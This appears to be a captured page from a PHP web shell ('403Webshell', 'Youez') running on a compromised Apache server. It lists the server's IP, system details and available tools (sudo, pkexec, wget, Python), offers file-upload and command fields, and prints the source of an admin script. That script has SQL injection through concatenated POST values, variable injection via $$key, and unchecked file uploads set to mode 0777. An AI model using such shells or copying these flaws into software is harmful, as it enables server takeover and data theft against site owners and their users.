403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_newcategory.php
<?php
include_once("session.php");
include_once("settings.php");


foreach ($_REQUEST as $key => $value) {
    $$key = $value;
}
$Catgory_Description = addslashes($Catgory_Description);
$target_path = "../cat_images/catBg/";
$prefix = time();
$target_path = $target_path . basename($prefix . $_FILES['image']['name']);




$name = $_POST['Brand_Name'];
$category = $_POST['Categoryname'];
$feedback = $_POST['Feedback_Name'];


//           EDIT code

if ($_REQUEST['mode'] == "Edit") {  
    
    
    
    
 $Image_Data="select * from tblnewcategory where category_id = '" .$_POST['id']. "'"; 
 $query=  mysql_query($Image_Data); 
 $rows = mysql_fetch_assoc($query);
    
 
 
    if ($_FILES['image']['name'] != "") {
        if (move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) {
            chmod($target_path, 0777);
            //echo "The file ". basename( $_FILES['file']['name']). " has been uploaded";
            $upload_image = basename($prefix . $_FILES['image']['name']);
        }
    } else {

        $upload_image = $rows['image'];
    }
    
    
    $sql = "update tblnewcategory set brand_name = '" . $name . "',category_name = '" . $category . "',feedback = '" . $feedback . "',image = '" . $upload_image . "' where category_id = '" . $_POST['id'] . "'";

    }
    
    
    
else {

    if ($_FILES['image']['name'] != "") {
        if (move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) {
            chmod($target_path, 0777);
            //echo "The file ". basename( $_FILES['file']['name']). " has been uploaded";
            $upload_image = basename($prefix . $_FILES['image']['name']);
        }
    }





    $sql = "insert into tblnewcategory (brand_name,category_name,feedback,image) VALUES ('$name','$category', '$feedback','$upload_image')";
    //echo $sql; die;
}

$result = mysql_query($sql) 
        or die(mysql_error());
?>

<script>
    document.location = "category_Newlist.php?page=listNewcategory";
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit